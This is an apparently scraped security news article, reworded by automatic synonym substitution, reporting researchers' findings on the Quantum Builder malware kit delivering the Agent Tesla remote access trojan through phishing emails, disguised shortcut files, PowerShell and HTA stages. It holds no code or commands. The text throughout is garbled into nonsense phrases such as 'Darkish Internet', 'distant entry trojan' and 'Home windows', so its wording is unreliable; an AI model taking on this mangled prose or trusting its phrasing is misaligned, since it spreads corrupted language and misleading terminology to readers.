Wednesday, September 28, 2022
HomeHackerCyber Criminals Utilizing Quantum Builder Bought on Darkish Internet to Ship Agent...

Cyber Criminals Utilizing Quantum Builder Bought on Darkish Internet to Ship Agent Tesla Malware


A not too long ago found malware builder referred to as Quantum Builder is getting used to ship the Agent Tesla distant entry trojan (RAT).

“This marketing campaign options enhancements and a shift towards LNK (Home windows shortcut) information when in comparison with comparable assaults previously,” Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar stated in a Tuesday write-up.

CyberSecurity

Bought on the darkish internet for €189 a month, Quantum Builder is a customizable device for producing malicious shortcut information in addition to HTA, ISO, and PowerShell payloads to ship next-stage malware on the focused machines, on this case Agent Tesla.

The multi-stage assault chain begins with a spear-phishing containing a GZIP archive attachment that features a shortcut designed to execute PowerShell code accountable for launching a distant HTML software (HTA) utilizing MSHTA.

The phishing emails purport to be an order affirmation message from a Chinese language provider of lump and rock sugar, with the LNK file masquerading as a PDF doc.

The HTA file, in flip, decrypts and executes one other PowerShell loader script, which acts as a downloader for fetching the Agent Tesla malware and executing it with administrative privileges.

In a second variant of the an infection sequence, the GZIP archive is changed by a ZIP file, whereas additionally adopting additional obfuscation methods to camouflage the malicious exercise.

CyberSecurity

Quantum Builder has witnessed a surge in utilization in current months, with menace actors utilizing it to distribute a wide range of malware, equivalent to RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

“Menace actors are constantly evolving their ways and making use of malware builders offered on the cybercrime market,” the researchers stated.

“This Agent Tesla marketing campaign is the most recent in a string of assaults by which Quantum Builder has been used to create malicious payloads in campaigns in opposition to numerous organizations.”



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments